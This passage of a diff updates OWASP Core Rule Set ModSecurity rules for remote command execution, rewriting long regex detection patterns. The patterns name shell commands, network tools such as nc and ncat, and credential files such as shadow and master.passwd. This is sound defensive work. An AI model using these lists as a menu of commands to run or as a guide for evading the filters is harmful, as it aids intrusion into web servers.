sw)(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|(?:h|ac)(?:[\s\x0b&\),<>\|]|$))|x(?:[\s\x0b&\),<>\|]|$|(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool)|2fsck|asy_install)|f(?:(?:c|mt|etch|lock|unction)(?:[\s\x0b&\),<>\|]|$)|d(?:[\s\x0b&\),<>\|]|$|(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|i(?:[\s\x0b&\),<>\|]|$|le(?:[\s\x0b&\),<>\|]|$|test)|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|tp(?:[\s\x0b&\),<>\|]|$|stats|who)|acter|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$))|g(?:c(?:c[^\s\x0b]{1,10}\b|ore(?:[\s\x0b&\),<>\|]|$))|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:m|tfacl)(?:[\s\x0b&\),<>\|]|$)|ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage))|hc(?:[\s\x0b&\),<>\|]|$|-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:c(?:[\s\x0b&\),<>\|]|$|at(?:[\s\x0b&\),<>\|]|$))|ep(?:[\s\x0b&\),<>\|]|$)|oup(?:[\s\x0b&\),<>\|]|$|mod))|tester|unzip)|(?:(?:GE|POS)T|y(?:e(?:s|lp)|um|arn)|HEAD)(?:[\s\x0b&\),<>\|]|$)|h(?:(?:d|up|ash|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:(?:d|rb|conv|nstall)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|6?tables|config|p(?:eveprinter|find|tool))|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|spell)|j(?:(?:js|q|ava|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:(?:bs|in)(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:s(?:h(?:[\s\x0b&\),<>\|]|$)|shell)|ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$))|l(?:d(?:[\s\x0b&\),<>\|]|$|d(?:[\s\x0b&\),<>\|]|$)|config)|(?:[np]|ynx)(?:[\s\x0b&\),<>\|]|$)|s(?:[\s\x0b&\),<>\|]|$|(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|ua(?:[\s\x0b&\),<>\|]|$|(?:la)?tex)|z(?:[\s\x0b&\),<>\|]|$|4(?:[\s\x0b&\),<>\|]|$|c(?:[\s\x0b&\),<>\|]|$|at))|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore))|a(?:st(?:[\s\x0b&\),<>\|]|$|comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|ess(?:[\s\x0b&\),<>\|]|$|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:ca(?:l|te)|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke|wk)(?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|[qx](?:[\s\x0b&\),<>\|]|$))|ster\.passwd)|(?:tr|v|utt)(?:[\s\x0b&\),<>\|]|$)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:(?:re|unt)(?:[\s\x0b&\),<>\|]|$)|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:[\s\x0b&\),<>\|]|$|\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:t(?:[\s\x0b&\),<>\|]|$|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)(?:[\s\x0b&\),<>\|]|$)|m(?:[\s\x0b&\),<>\|]|$|ap(?:[\s\x0b&\),<>\|]|$))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:(?:d|ctave)(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:x|cman|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:[\s\x0b&\),<>\|]|$|2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|f(?:[\s\x0b&\),<>\|]|$|tp(?:[\s\x0b&\),<>\|]|$))|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|hp(?:[\s\x0b&\),<>\|]|$|-cgi|[57](?:[\s\x0b&\),<>\|]|$))|i(?:c(?:[\s\x0b&\),<>\|]|$|o(?:[\s\x0b&\),<>\|]|$))|p[^\s\x0b]{1,10}\b|dstat|(?:gz|ng)(?:[\s\x0b&\),<>\|]|$))|k(?:g(?:[\s\x0b&\),<>\|]|$|_?info)|exec|ill(?:[\s\x0b&\),<>\|]|$))|r(?:[\s\x0b&\),<>\|]|$|y(?:[\s\x0b&\),<>\|]|$)|int(?:env|f(?:[\s\x0b&\),<>\|]|$)))|s(?:[\s\x0b&\),<>\|]|$|(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|t(?:x(?:[\s\x0b&\),<>\|]|$)|ar(?:[\s\x0b&\),<>\|]|$|diff|grep))|wd(?:[\s\x0b&\),<>\|]|$|\.db)|(?:xz|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|y(?:3?versions|thon[23]))|r(?:(?:a(?:r|k[eu])|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|c(?:[\s\x0b&\),<>\|]|$|p(?:[\s\x0b&\),<>\|]|$))|e(?:d(?:[\s\x0b&\),<>\|]|$|carpet(?:[\s\x0b&\),<>\|]|$))|(?:v|boot|name|p(?:eat|lace))(?:[\s\x0b&\),<>\|]|$)|a(?:delf|lpath)|stic)|m(?:[\s\x0b&\),<>\|]|$|dir(?:[\s\x0b&\),<>\|]|$)|user)|pm(?:[\s\x0b&\),<>\|]|$|db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n-(?:mailcap|parts)))|s(?:(?:c(?:p|hed|r(?:een|ipt))|g|ash|diff|ftp|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:d|ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:[\s\x0b&\),<>\|]|$|arch|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:[\s\x0b&\),<>\|]|$|\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|h(?:[\s\x0b&\),<>\|]|$|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\),<>\|]|$|do(?:[\s\x0b&\),<>_\|]|$|edit|replay))|vn(?:[\s\x0b&\),<>\|]|$|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:(?:(?:ca|r)t|urce)(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:[cr](?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|sk(?:[\s\x0b&\),<>\|]|$|set))|(?:bl|o(?:p|uch)|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:p(?:[\s\x0b&\),<>\|]|$|dump|ing|traceroute)|l?sh(?:[\s\x0b&\),<>\|]|$))|e(?:[ex](?:[\s\x0b&\),<>\|]|$)|lnet)|i(?:c(?:[\s\x0b&\),<>\|]|$)|me(?:[\s\x0b&\),<>\|]|$|datectl|out(?:[\s\x0b&\),<>\|]|$)))|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:dp(?:[\s\x0b&\),<>\|]|$)|l(?:[\s\x0b&\),<>\|]|$|imit(?:[\s\x0b&\),<>\|]|$))|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|p(?:2date(?:[\s\x0b&\),<>\|]|$)|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:[\s\x0b&\),<>\|]|$|m(?:[\s\x0b&\),<>\|]|$|diff)|(?:[ep]w|gr|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo)|algrind|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:[\s\x0b&\),<>\|]|$|(?:c|a(?:ll|tch))(?:[\s\x0b&\),<>\|]|$)|h(?:o(?:[\s\x0b&\),<>\|]|$|ami|is(?:[\s\x0b&\),<>\|]|$))?|iptail(?:[\s\x0b&\),<>\|]|$))|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:(?:x|pa)d|args|term)(?:[\s\x0b&\),<>\|]|$)|z(?:[\s\x0b&\),<>\|]|$|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$)))|z(?:ip(?:[\s\x0b&\),<>\|]|$|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h(?:[\s\x0b&\),<>\|]|$)|oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|more|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|ypper))(?:\b|[^0-9A-Z_a-z])" \
     "id:932237,\
     phase:1,\
     block,\
@@ -1627,9 +1695,10 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[arx]
     tag:'attack-rce',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1670,7 +1739,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z[arx]
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932238
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)